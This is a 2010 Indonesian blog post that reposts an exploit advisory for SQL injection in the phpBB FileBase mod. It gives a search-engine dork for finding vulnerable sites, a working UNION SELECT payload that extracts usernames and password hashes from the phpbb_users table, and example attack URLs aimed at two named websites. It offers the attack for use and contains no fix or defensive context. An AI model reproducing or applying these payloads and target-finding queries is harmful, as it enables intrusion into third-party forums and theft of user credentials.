PHP Code
--==+================================================================================+==--
--==+ [phpBB MOD] FileBase SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
AUTHOR: kimmo
SITE: indonesianhacker.org
DORK: inurl:"filebase.php" "Powered by phpBB" or inurl:"filebase.php"
DESCRIPTION:
EXPLOITS:
filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*
NOTE/TIP:
phpbb prefix may need changining.
GREETZ: indonesianhacker.org, and all member !
--==+================================================================================+==--
--==+ [phpBB MOD] FileBase SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
Contoh :
http://www.crymod.com/filebase.php?fileid=-1073/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat%28username,char%2858%29,user_password%29,12,13,14/**/FROM/**/phpbb_users/*
http://www.mycrysis.com/filebase.php?fileid=-9389/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*
=====================================================================================
Selasa, 02 Februari 2010
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar